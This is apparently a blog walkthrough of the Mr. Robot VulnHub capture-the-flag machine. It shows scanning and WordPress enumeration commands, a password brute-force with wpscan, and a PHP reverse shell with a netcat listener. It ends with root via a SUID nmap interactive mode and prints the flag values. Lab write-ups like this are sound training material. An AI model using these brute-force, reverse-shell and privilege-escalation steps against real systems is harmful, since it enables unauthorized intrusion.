"Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate."
Lets Reap Some Bytes
|Command: netdiscover -r 10.10.10.0/24|
|Command: nmap -sS -Pn -p1-65535 10.10.10.4|
Sweet. Nothing but http/https running.
|Command: nikto -host 10.10.10.4|
This should definitely help us get a rev shell.
|Command: wpscan --url http://10.10.10.4|
WPScan has revealed much of the same normal stuff. Although nikto did not tell us that a robots.txt was present so i will WGet the robots.txt file and see if there are any other clues to be found.
|Command: wget http://10.10.10.4/robots.txt|
|Command: cat robots.txt|
So robots.txt reveals our first key and a fsocity.dic file. We use wget to retrieve both.
First Key: 073403c8a58a1f80d943455fb30724b9
So i decided to reinvent the wheel and create my own WordPress user enum tool. (WPScan can do this but i wanted to work in some python of my own, for learnings sake).
****NOTE: I opted not to use threading due to the small amount of enumberation that needs to occur. I would add multithreading if i was to use very large username lists ****
|Command: python MrRobot_WPUsername_Enum.py /usr/share/wordlists/ByteReaper_Lists/Given-Names http://10.10.10.4/wp-login.php|
Found User: elliot (the name list i used is from outpost9)
Using the username elliot we should be able to bruteforce a password. I decided that the fsocity.dic file would be a good dictionary to use as it was given to us by the author :)
|Command: wpscan --url http://10.10.10.4 --wordlist ~/Documents/MrRobot/fsocity.dic --threads 50 --username elliot|
Awesome we have a hit...after 4 hours...because the password was the 2nd to last word in the list....thanks for that...
Upon logging in as elliot i was able to modify the php of the site to add a reverse shell.
|Command: nc -lvp 80|
|Command: python -c "import pty;pty.spawn('/bin/bash');"|
|Command: ls -lah|
Sweet the 2nd flag (we cannot read it currently, and admittedly i forgot to go back for it).
|Command: cat password.raw-md5|
Dropping the hash into the google resulted in "abcdefghijklmnopqrstuvwxyz". lul.
|Command: su robot|
(again i forgot to cat the 2-of-3-flag.txt file)...
I did a good amount of looking around for sudo -l, crons, etc. i found nothing much with any of them. But what i did find was a suid bit for nmap. Awesome nmap has an interactive mode. Lets see if we can get anything with it.
|Command: nmap --interactive|
|Sweet. We got r00t. and our third flag.|
w00t w00t. flag 3 ==> 04787ddef27c3dee1ee161b21670b4e4
Sorry for the abbreviated ending to this tutorial. I was trying to finish asap before the long weekend.
Thanks again to vulnhub for hosting this awesomeness.